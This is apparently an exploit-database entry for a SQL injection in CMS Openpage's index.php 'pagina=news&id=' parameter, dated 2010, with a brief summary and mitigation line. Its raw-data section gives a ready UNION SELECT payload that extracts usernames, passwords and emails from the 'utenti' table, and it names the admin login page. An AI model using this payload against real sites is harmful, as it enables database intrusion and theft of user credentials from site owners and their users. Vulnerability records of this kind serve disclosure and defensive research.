CMS Openpage (index.php) SQL Injection Vulnerability

vendor:

CMS Openpage

by:

Phenom

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS Openpage

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

CMS Openpage (index.php) SQL Injection Vulnerability

CMS Openpage is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'index.php?pagina=news&id='. This can allow the attacker to gain access to the database and extract sensitive information such as usernames, passwords, and emails.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

====================================================
CMS Openpage (index.php) SQL Injection Vulnerability
====================================================

[+] Discovered by: Phenom
[+] My id: http://inj3ct0r.com/author/2157
[+] Original: http://inj3ct0r.com/exploits/9666

# Exploit Title: CMS Openpage (index.php) SQL Injection Vulnerability
# Tested on: windows xp sp3
# Code :

>>[Author] = Phenom

>>[CMS] = CMS Openpage

>>[Dork] = I hate script kiddies

>>[Date] = 2010-03-22


>>[Exploit] :

[Bug] = [index.php?pagina=news&id=]

[Usage] = http://www.site/index.php?pagina=news&id=[SQL Injection]

[Login] = http://site/index_priv.php


>>[Demo] :

[+] http://[site]/index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--


# Inj3ct0r.com [2010-03-22]